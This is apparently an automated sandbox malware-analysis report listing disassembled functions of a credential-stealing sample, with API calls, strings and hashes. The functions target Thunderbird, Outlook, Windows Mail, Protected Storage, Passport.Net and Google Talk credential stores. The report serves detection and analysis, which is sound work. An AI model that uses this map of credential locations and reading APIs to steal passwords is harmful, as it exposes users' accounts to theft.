                    Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 00401E8B
                    • strlen.MSVCRT ref: 00401EA4
                    • strlen.MSVCRT ref: 00401EB2
                    • strlen.MSVCRT ref: 00401EF8
                    • strlen.MSVCRT ref: 00401F06
                    • memset.MSVCRT ref: 00401FB1
                    • atoi.MSVCRT ref: 00401FE0
                    • memset.MSVCRT ref: 00402003
                    • sprintf.MSVCRT ref: 00402030
                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                    • memset.MSVCRT ref: 00402086
                    • memset.MSVCRT ref: 0040209B
                    • strlen.MSVCRT ref: 004020A1
                    • strlen.MSVCRT ref: 004020AF
                    • strlen.MSVCRT ref: 004020E2
                    • strlen.MSVCRT ref: 004020F0
                    • memset.MSVCRT ref: 00402018
                      • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                    • _mbscpy.MSVCRT ref: 00402177
                    • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                    • API String ID: 1846531875-4223776976
                    • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                    • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                    • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                    • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                    Function 0040CF44 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 169COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                      • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                      • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                      • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                    • DeleteObject.GDI32(?), ref: 0040D1A6
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                    • API String ID: 745651260-375988210
                    • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                    • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                    • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                    • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                    Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                    • _mbscpy.MSVCRT ref: 00403E54
                    Strings
                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                    • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                    • PStoreCreateInstance, xrefs: 00403C44
                    • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                    • pstorec.dll, xrefs: 00403C30
                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                    • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$AddressFreeLoadProc_mbscpy
                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                    • API String ID: 1197458902-317895162
                    • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                    • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                    • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                    • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                    Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 231 40fb00-40fb35 call 44b090 RegOpenKeyExA 234 40fc37-40fc3d 231->234 235 40fb3b-40fb4f RegOpenKeyExA 231->235 236 40fb55-40fb7e RegQueryValueExA 235->236 237 40fc2d-40fc31 RegCloseKey 235->237 238 40fc23-40fc27 RegCloseKey 236->238 239 40fb84-40fb93 call 404734 236->239 237->234 238->237 239->238 242 40fb99-40fbd1 call 4047a5 239->242 242->238 245 40fbd3-40fbdb 242->245 246 40fc19-40fc1d LocalFree 245->246 247 40fbdd-40fc14 memcpy * 2 call 40f802 245->247 246->238 247->246
                    APIs
                    • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                    • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    • memcpy.MSVCRT ref: 0040FBE4
                    • memcpy.MSVCRT ref: 0040FBF9
                      • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                      • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                      • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                      • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                    • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                    • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                    • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                    • API String ID: 2768085393-2409096184
                    • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                    • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                    • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                    • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                    Function 00444C4A Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 249 444c4a-444c66 call 444e38 GetModuleHandleA 252 444c87-444c8a 249->252 253 444c68-444c73 249->253 255 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 252->255 253->252 254 444c75-444c7e 253->254 257 444c80-444c85 254->257 258 444c9f-444ca3 254->258 263 444d02-444d0d __setusermatherr 255->263 264 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 255->264 257->252 260 444c8c-444c93 257->260 258->252 261 444ca5-444ca7 258->261 260->252 265 444c95-444c9d 260->265 262 444cad-444cb0 261->262 262->255 263->264 268 444da4-444da7 264->268 269 444d6a-444d72 264->269 265->262 270 444d81-444d85 268->270 271 444da9-444dad 268->271 272 444d74-444d76 269->272 273 444d78-444d7b 269->273 275 444d87-444d89 270->275 276 444d8b-444d9c GetStartupInfoA 270->276 271->268 272->269 272->273 273->270 274 444d7d-444d7e 273->274 274->270 275->274 275->276 277 444d9e-444da2 276->277 278 444daf-444db1 276->278 279 444db2-444dc6 GetModuleHandleA call 40cf44 277->279 278->279 282 444dcf-444e0f _cexit call 444e71 279->282 283 444dc8-444dc9 exit 279->283 283->282
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                    • String ID:
                    • API String ID: 3662548030-0
                    • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                    • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                    • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                    • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                    Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 0044430B
                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                      • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                      • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                      • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                      • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                    • memset.MSVCRT ref: 00444379
                    • memset.MSVCRT ref: 00444394
                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                    • strlen.MSVCRT ref: 004443DB
                    • _strcmpi.MSVCRT ref: 00444401
                    Strings
                    • \Microsoft\Windows Mail, xrefs: 00444329
                    • \Microsoft\Windows Live Mail, xrefs: 00444350
                    • Store Root, xrefs: 004443A5
                    • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                    • API String ID: 832325562-2578778931
                    • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                    • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                    • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                    • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                    Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 321->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                    APIs
                    • memset.MSVCRT ref: 0040F567
                    • memset.MSVCRT ref: 0040F57F
                      • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                    • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    • memcpy.MSVCRT ref: 0040F652
                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                    • String ID:
                    • API String ID: 2012582556-3916222277
                    • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                    • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                    • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                    • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                    Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                    APIs
                    • memset.MSVCRT ref: 004037EB
                    • memset.MSVCRT ref: 004037FF
                      • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                      • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                      • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                    • strchr.MSVCRT ref: 0040386E
                    • _mbscpy.MSVCRT ref: 0040388B
                    • strlen.MSVCRT ref: 00403897
                    • sprintf.MSVCRT ref: 004038B7
                    • _mbscpy.MSVCRT ref: 004038CD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                    • String ID: %s@yahoo.com
                    • API String ID: 317221925-3288273942
                    • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                    • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                    • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                    • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                    Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 362 404af5-404afa 356->362 361 404adb 357->361 358->356 359 404ae8-404aea 358->359 359->362 361->358 363 404b13-404b17 362->363 364 404afc-404b12 MessageBoxA 362->364
                    APIs
                    • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                    • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                    • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$AddressFreeLoadMessageProc
                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                    • API String ID: 2780580303-317687271
                    • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                    • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                    • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                    • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                    Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                    APIs
                    • memset.MSVCRT ref: 00403504
                    • memset.MSVCRT ref: 0040351A
                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                    • _mbscpy.MSVCRT ref: 00403555
                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                    • _mbscat.MSVCRT ref: 0040356D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscatmemset$Close_mbscpystrlen
                    • String ID: InstallPath$Software\Group Mail$fb.dat
                    • API String ID: 3071782539-966475738
                    • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                    • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                    • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                    • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                    Function 0040F6E2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97stringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 374 40f6e2-40f70a call 40466b call 4045db 379 40f710-40f717 call 404734 374->379 380 40f7e9-40f801 call 404656 call 404785 374->380 379->380 385 40f71d-40f72e CredReadA 379->385 385->380 387 40f734-40f73a 385->387 389 40f740-40f743 387->389 390 40f7e5 387->390 389->390 391 40f749-40f759 389->391 390->380 392 40f75a-40f770 391->392 392->392 393 40f772-40f795 call 4047a5 392->393 396 40f7e2 393->396 397 40f797-40f7b6 WideCharToMultiByte 393->397 396->390 398 40f7b8-40f7c6 strlen 397->398 399 40f7d9-40f7dc LocalFree 397->399 398->399 400 40f7c8-40f7d8 _mbscpy 398->400 399->396 400->399
                    APIs
                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    • CredReadA.ADVAPI32(Passport.Net\*,00000004,00000000,?,?,00000000), ref: 0040F729
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                    • strlen.MSVCRT ref: 0040F7BE
                    • _mbscpy.MSVCRT ref: 0040F7CF
                    • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharCredFreeLocalMultiReadWidestrlen
                    • String ID: Passport.Net\*
                    • API String ID: 4000595657-3671122194
                    • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                    • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                    • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                    • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                    Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 401 40ccd7-40cd06 ??2@YAPAXI@Z 402 40cd08-40cd0d 401->402 403 40cd0f 401->403 404 40cd11-40cd24 ??2@YAPAXI@Z 402->404 403->404 405 40cd26-40cd2d call 404025 404->405 406 40cd2f 404->406 408 40cd31-40cd57 405->408 406->408 410 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 408->410 411 40cd59-40cd60 DeleteObject 408->411 411->410
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                    • String ID:
                    • API String ID: 2054149589-0
                    • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                    • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                    • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                    • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                    Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                      • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                      • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                    • memset.MSVCRT ref: 00408620
                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                    • memset.MSVCRT ref: 00408671
                    • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                    • RegCloseKey.ADVAPI32(?), ref: 004086D6
                    Strings
                    • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                    • String ID: Software\Google\Google Talk\Accounts
                    • API String ID: 1366857005-1079885057
